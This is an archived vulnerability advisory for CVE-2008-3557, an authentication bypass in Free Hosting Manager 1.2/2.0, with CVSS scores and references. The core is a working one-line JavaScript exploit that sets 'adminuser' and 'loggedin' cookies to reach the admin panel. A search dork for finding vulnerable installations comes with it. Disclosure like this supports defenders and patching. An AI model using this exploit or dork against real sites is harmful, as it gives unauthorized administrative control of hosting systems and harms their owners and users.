Free Hosting Manager 1.2/2.0 Insecure Cookie Handling Vulnerability

2008.08.11
Credit: Scary-Boys
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2008-3557
CWE: CWE-264


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################################### # # #Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability# # # ######################################################################### # # # AUTHOR : Scary-Boys # # HOME : http://scary-boys.com # # Founded By : lvlr-Erfan # # Download : http://www.fhm-script.com/download.php # # # ######################################################################### # # # DorKs : "Powered By Free Hosting Manager" # # # ######################################################################### # # # DESCRIPTION : # # the admin panel only checks if the cookie exists. # # # ######################################################################### # # # Vulnerability : # # # # javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/"; # # ######################################################################### # # # after running the javascript, Go to "/admin" & Refresh # # # #########################################################################

References:

http://www.securityfocus.com/bid/30580
http://www.milw0rm.com/exploits/6213
http://secunia.com/advisories/31383


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top